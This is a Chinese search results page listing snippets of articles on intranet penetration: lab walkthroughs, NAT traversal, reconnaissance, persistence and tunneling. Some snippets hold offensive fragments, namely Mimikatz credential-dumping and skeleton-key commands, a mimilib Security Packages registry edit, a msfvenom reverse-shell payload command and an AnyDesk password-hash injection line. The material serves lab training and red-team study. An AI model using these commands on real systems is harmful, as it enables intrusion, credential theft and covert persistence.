首页
学习
活动
专区
圈层
工具
发布
    • 综合排序
    • 最热优先
    • 最新优先
    时间不限
  • 来自专栏web安全(One)

    红日内网靶机练习3

    靶机下载地址:http://vulnstack.qiyuanxuetang.net/vuln/ win7(双网卡): 192.168.1.18外网) 192.168.138.136(内网) win2008 ^>>shell.php image.png image.png 上线C2 image.png ---- 内网渗透 image.png image.png 内网存活主机探测 image.png

    83510发布于 2021-07-12
  • 来自专栏Web 开发

    ST3内网安装插件手札

    去ST的官网下载最新版(Sublime Text 3),免费用户会不时有弹窗,不过不影响使用。 http://www.sublimetext.com/3 安装好ST3之后,安装Package Control。 因为内网需要使用代理,故默认的安装Package Control的方式无效,只能手动安装。 ST3的代理。 更多可定制配置,可以查看Preferences > Package Settings > Package Control > Settings – Default 结语: ST3的Proxy配置,配置起来

    40900发布于 2018-08-08
  • 来自专栏谢公子学安全

    内网渗透 | 内网穿透

    内网穿透 目录 内网穿透 内网穿透工具 学了网络之后,我们知道了公网和私网。私网是不能在公网传输和通信的。我们一个学校,一个小区,都是在自己单独的私网里面。 内网穿透 这就要说到内网穿透了! 如下图,有这么一个环境。小明和小王分别是清华和北大的学生。他们都各自处在自己学校的内网中,他们的ip地址可以是一样的,都是192.168.10.2。 因为在路由器体内有一个私网ip和端口的对照表,每个私网ip对应一个端口,所以根据端口就能知道消息是发送给内网中的哪台主机了。 192.168.10.10:22222 <——> 10000 当我们访问百度这个事情做完之后的一定时间内,Session记录就会在路由器的体内消失,这个10000端口可以继续分配给其他用户 那么现在我们再来分析一下位于内网中的我们如何和同样是内网中的小伙伴通过 内网穿透工具 常用的内网穿透的工具有:NAT APP基于ngrok的国内高速内网转发工具 这款软件可以把你内网的ip和端口映射成一个公网的ip和端口,这样,我们就可以实现内网穿透了!

    3.5K10编辑于 2022-01-19
  • 来自专栏黑白天安全团队

    内网渗透 | 内网穿透

    内网穿透 目录 内网穿透 内网穿透工具 学了网络之后,我们知道了公网和私网。私网是不能在公网传输和通信的。我们一个学校,一个小区,都是在自己单独的私网里面。 内网穿透 这就要说到内网穿透了! 如下图,有这么一个环境。小明和小王分别是清华和北大的学生。他们都各自处在自己学校的内网中,他们的ip地址可以是一样的,都是192.168.10.2。 因为在路由器体内有一个私网ip和端口的对照表,每个私网ip对应一个端口,所以根据端口就能知道消息是发送给内网中的哪台主机了。 那么现在我们再来分析一下位于内网中的我们如何和同样是内网中的小伙伴通过QQ通信。 内网穿透工具 常用的内网穿透的工具有:NAT APP基于ngrok的国内高速内网转发工具 这款软件可以把你内网的ip和端口映射成一个公网的ip和端口,这样,我们就可以实现内网穿透了!

    5.1K60发布于 2020-03-10
  • 来自专栏湛卢工作室

    社工模拟——利用BadUSB穿透3内网

    一时好奇,于是尝试模拟一次社工,利用VMware搭建了3层网络靶场,通过BadUSB+MSF的攻击手段,一步一步渗透到第三层网络。 我们可以利用VMware搭建出3层网络的网络环境,首先在虚拟机中新建3块网卡,并选择仅主机模式: ? 同理,将第二层靶机win2003设为双网卡vmnet2和vmnet3: ? 最后,将第三层靶机linux的网络设为vmnet3: ? 至此,我们本次试验的3层网络靶场已经搭建完毕,攻击者的kali只能访问第一层网络,而无法访问第二层和第三层的靶机: ? MSF制作的后门,所以在插上u盘之后,员工的办公电脑就已经被黑客控制,黑客从而可以进一步进行内网渗透、横向扩展。

    2.3K21发布于 2019-11-20
  • 来自专栏安全小圈

    内网基础篇——浅谈内网

    内网也指局域网,是指某一区域内由多台计算机互联而成的计算机组,组网的范围通常是数千米内。 ? ? 在用路由器连接的内网中,可以将网络划分为三个区域:安全级别最高的内网;安全级别中等的DMZ;安全级别最低的外网(Internet)。 ? ? 在配置一个拥有DMZ的网络时,通常需要定义如下访问控制策略 内网可以访问外网:内网用户需要自由地访问外网。 DMZ不能访问内网:如不执行,攻击者攻陷DMZ时,厄尼旺将无法收到保护 DMZ不能访问外网:有例外 内网可以分为办公区和核心区(横向移动攻击的优先查找目标) 域中计算机的分类 域控制器 附带一份内网学习思维导图 ? ?

    2.4K40发布于 2020-05-26
  • 来自专栏TeamsSix的网络空间安全专栏

    内网学习笔记 | 3、本地工作组信息收集

    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings" 查询并开启远程连接服务 查看远程连接端口(0xd3d MSF 是全平台的,无论是win,linux,mac都可以打,但 Empire 是只针对 Windows 的 MSF 集信息收集,渗透,后渗透,木马,社工的功能为一体,全面多能;而 Empire 专注于内网渗透 www.freebuf.com/articles/system/114731.html https://blog.csdn.net/bring_coco/article/details/113550173 ---- 往期推荐 内网学习笔记 | 2、PowerShell 内网学习笔记 | 1、内网中常见名词解释 经验总结 | CS与MSF之间的会话传递

    90530发布于 2021-03-05
  • 来自专栏字节脉搏实验室

    内网基础篇——浅谈内网

    在用路由器连接的内网中,可以将网络划分为三个区域:安全级别最高的内网;安全级别中等的DMZ;安全级别最低的外网(Internet)。 ? 在配置一个拥有DMZ的网络时,通常需要定义如下访问控制策略 内网可以访问外网:内网用户需要自由地访问外网。 防火墙需要进行NAT 内网可以访问DMZ:此策略时用户可以使用或者管理DMZ中地服务器 外网不能访问内网:防火墙的基本策略,如需访问,通过V**的方式 外网可以访问DMZ:需要由防火墙来完成对外地址到服务器实际地址的转换 DMZ不能访问内网:如不执行,攻击者攻陷DMZ时,厄尼旺将无法收到保护 DMZ不能访问外网:有例外 内网可以分为办公区和核心区(横向移动攻击的优先查找目标) 域中计算机的分类 域控制器 附带一份内网学习思维导图 ?

    1.9K40发布于 2020-05-25
  • 来自专栏我的安全视界观

    【应急能力提升3内网横向移动攻击模拟(上)

    整个攻击模拟专项,主要分为以下五个步骤: 02 — 攻击链设计 在第I期的基础上,引入了供应链软件攻击、内网横向攻击,同时加入两台不同操作系统的服务器进行双向攻击,让模拟更贴近实战、让应急响应场景更加复杂 Windows2008 x64 R2(无补丁版本) PHP 5.2.17 MySQL 5.6 phpcms V9.6 1)Phpstudy2016/2018供应链后门版本2)HFS Rejetto 2.x版本3) CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections 6.3.4 COM组件劫持 利⽤{42aedc87-2188-41fd-b9a3- ,添加/修改数据: C:\ProgramData\Package Cache\{BCDE0395-E52F-467C-8E3DC4579291692E}\api-ms-win-downlevel-1x86 6.5 横向移动 6.5.1 内网主机探测 查看地址解析情况arp –a,发现C段存活主机 6.5.2 端口与目录扫描 18:05,上传扫描⼯具 TxPortMap_windows_amd64.exe

    1.8K20编辑于 2022-08-31
  • 来自专栏小生观察室

    内网渗透之内网隧道构建

    image.png 视频内容 内网渗透之内网隧道构建 1080P超清版 微信公众号平台本身会对素材进行二次压缩,会导致画面出现不清晰等情况。

    1.5K30发布于 2021-03-05
  • 来自专栏网络安全攻防

    内网渗透之内网权限维持

    文章前言 随着企业信息化程度的加深,内网环境逐渐成为攻击者的关注的重点目标,在内网渗透的过程中权限维持是不可或缺的关键环节之一,它往往决定了攻击者能否在目标系统中长时间潜伏,获取敏感信息或者造成更大范围的破坏 Mimikatz,之后执行以下命令,可以得到DSRM账户的NTLM Hash为:41945356c1b2adde08c00d0e48515b7e token::elevate lsadump::sam Step 3: sid::patch sid::add /sam:al1ex /new:administrator #将administrator的SID添加到al1ex的SID History属性中 Step 3: 权限维持 Step 1:下载POC(https://github.com/clymb3r/Misc-Windows-Hacking ),之后使用VS进行编译,在编译时需要先设置MFC为静态库中使用MFC ,其实内网主机有window,也有Linux,所以读者不用过于局限于内网手法进行权限维持(当然这种作为首选属实极好),至于window下的一系列维权也可以进行尝试操作,例如:WMI后门、CLR维权、COM

    1K10编辑于 2024-08-20
  • 来自专栏白安全组

    内网接收外网shell(内网穿透)

    前言: 内网穿透的方式不少,有人会也有人不太懂,最简单的,对新手友好的就是花生壳,但是要钱,对穷人不友好,这里我们就用操作稍微有点麻烦的但是免费的frp。 (这里不讲配置的一些理论理解了,麻烦,大家可以百度内网穿透的理论知识) 我们需要生成一下木马文件 msfvenom -p windows -a x64 -p windows/x64/shell_reverse_tcp

    2K20编辑于 2022-12-01
  • 来自专栏红队蓝军

    内网渗透之内网权限维持

    "misc::skeleton" exit 这个时候系统提示 Skeleton Key 已经注入成功,此时会在域内的所有账号中添加一个 Skeleton Key,其密码默认为:“mimikatz” 3、 name:krbtgt 2、mimikatz读取SAM文件中本地管理员的NTLM Hash 本地管理员账号也就是DSRM账号的NTLM Hash token::elevate lsadump::sam 3、 Security Packages" /d "kerberos\0msv1_0\0schannel\0wdigest\0tspkg\0pku2u\0mimilib" /t REG_MULTI_SZ 3、 PowerShell查看test用户的SID History Import-Module activedirectory Get-ADUser test -Properties sidhistory 3、 利用: 根据clymb3r提供的poc,实现Hook PasswordChangeNotify共包含两部分: 1、Hook dll 下载链接:https://github.com/clymb3r/Misc-Windows-Hacking

    87710编辑于 2025-02-12
  • 来自专栏HACK学习

    内网渗透之_内网IPC$入侵

    一、域操作相关的命令 1.查看域用户 net user/domain 2.查看有几个域 net view/domain 3.查看域内的主机 net view/domain: XXX 4.查看域里面的组 即使用139(TCP)端口;而在Windows2000中,SMB除了基于NBT实现,还可以直接通过445端口实现 IPC$入侵,即通过使用Windows系统默认启动的IPC$共享获得计算机控制权的入侵,在内网中及其常见

    2K30发布于 2019-08-06
  • 来自专栏HACK学习

    内网渗透|Chisel内网穿透工具

    (3):查看chisel客户端的帮助 ./chisel client -help ? 这块只是重点讲解一下如何查看帮助,接下来会去介绍如何在实战中使用chisel工具。 (3):第三步:使用攻击者主机连接kali的SSH ssh -p 8888 root@VPS(chisel服务端IP) ? (3):第三步:使用攻击者主机连接win7的3389 ? 成功登录远程桌面。 socks代理,然后使用SocksCap等工具进行内网扫描或者内网渗透。 (3):使用Socks代理访问内网 使用浏览器 ? ? 成功访问到内网的通达OA。 使用SocksCap进行内网访问 ? 代理搭建成功,流量可以正常进入内网

    13K21发布于 2021-03-03
  • 来自专栏TA码字

    k8s集群网络(3)-宿主内网络例子

    在上一篇文章中我们介绍了linux network namespace,linux bridge device,linux veth device,以及docker宿主环境中的容器网络。在这里我们主要结合实际例子,来看一下宿主环境中的容器网络。

    92330发布于 2020-04-01
  • 来自专栏全栈程序员必看

    内网渗透的步骤_内网渗透思路

    0x00 Preface 内网渗透主要是基于前期外围打点getshell的webserver,通过收集webserver上的信息,然后对其他内网主机进行口令上的攻击,当然也有一些基于漏洞的攻击。 某内网靶场的详细教程:Vulnstack(一) 内网渗透过程中经常会涉及到内网穿透,如何理解内网穿透以及端口转发、端口映射等相关知识可以参考:如何从零构建对内网穿透的理解 实操部分写的比较草率,主要是为了增强认知 利用流程: 1.建立IPC连接到目标主机(明文密码) 2.copy要执行的命令脚本到目标主机 3.查看目标时间,创建计划任务(at、schtasks)定时执行copy的脚本 4.删除IPC连接 查看当前网络连接 针对以上情况,我们提供了如下解决方案: 1.利用hash传递(pth、ptk等)进行移动 2.利用注册表操作开启 Wdigest Auth 值进行获取 3.利用工具或第三方平台(Hashcat)进行激活成功教程获取 对用户进行检 测,成功之后创建 TGT(Ticket-Granting Ticket) 2.将 TGT 进行加密签名返回给客户机器,只有域用户 krbtgt 才能读 取 kerberos 中 TGT 数据 3.

    5.5K30编辑于 2022-10-05
  • 来自专栏红蓝对抗

    内网渗透|内网远程控制总结

    前言 在内网渗透过程中,会碰到远程控制soft或者其他,这里针对远程控制软件做如下总结。 远程控制软件 向日葵篇 向日葵查看版本 向日葵(可以攻击) 针对向日葵的话其实如果有本地安装的话,是... 前言 在内网渗透过程中,会碰到远程控制soft或者其他,这里针对远程控制软件做如下总结。 --->之后点击应用,攻击机完全退出anydesk(小托盘也要退出),并且退出时不选择安装anydesk (3)攻击机完全退出anydesk(小托盘也要退出),这里还是到配置文件下 C:\Users\ echo ad.anynet.pwd_hash=85352d14ed8d515103f6af88dd68db7573a37ae0f9c9d2952c3a63a8220a501c >> C:\

    1.3K30编辑于 2023-08-10
  • 来自专栏HACK学习

    内网渗透 | 内网中的信息收集

    无论是通过外网打点,还是水坑钓鱼,进入内网后的第一步,也是最重要的一步就是信息收集,而且信息收集往往是一直穿插在整个内网渗透过程中。 hack7.local登录域 HACK7------------------------------------------------3. %I | findstr "TTL=" >> pinglive.txt 扫描的话建议直接在内网进行扫描,速度和准确率都比较有保障。 这里直接介绍需要在内网机器中执行的相关命令: 此工具的导出相对来说比较暴力,且目前此工具 exe 原版已经被识别并被各种杀软查杀,包括微软win10自带的杀软 Windows Defender 。 端口识别 扫描内网中同时开放389和53端口的机器。 端口:389服务:LDAP、ILS说明:轻型目录访问协议和NetMeeting Internet Locator Server共用这一端口。

    3.4K31发布于 2020-08-27
  • 来自专栏全栈程序员必看

    FRP内网穿透_frp内网穿透原理

    大家好,又见面了,我是你们的朋友全栈 frp点对点udp方式内网穿透ssh,节省服务器流量 (2019 年 5 月 30 日) frp ssh 安全连接和服务器安全设置 (2019 年 5 月 29 日) frp 控制台监控dashboard配置 (2019 年 5 月 27 日) frp内网穿透 公网访问本地web服务 (2019 年 5 月 26 日) frp安装教程 穿透SSH (2019 年 5 月 25 日) frp内网穿透简介 (2019 年 5 月 25 日) frp简介 frp 是一个内网穿透工具。 我们的电脑IP一般为192.168.0.103 这个叫内网IP,外面的电脑无法访问的。 frp进行的网络穿透原理图 frp穿透的用途 1. 在办公室访问家里的电脑,反之亦然 2. 3. 调试一些需要远程调用的程序,远程调用比如微信的API 回调接口。 因为我有了外网地址就不需要部署在公网服务器,直接进行本地调试,听起来都棒。

    3.9K40编辑于 2022-09-30
领券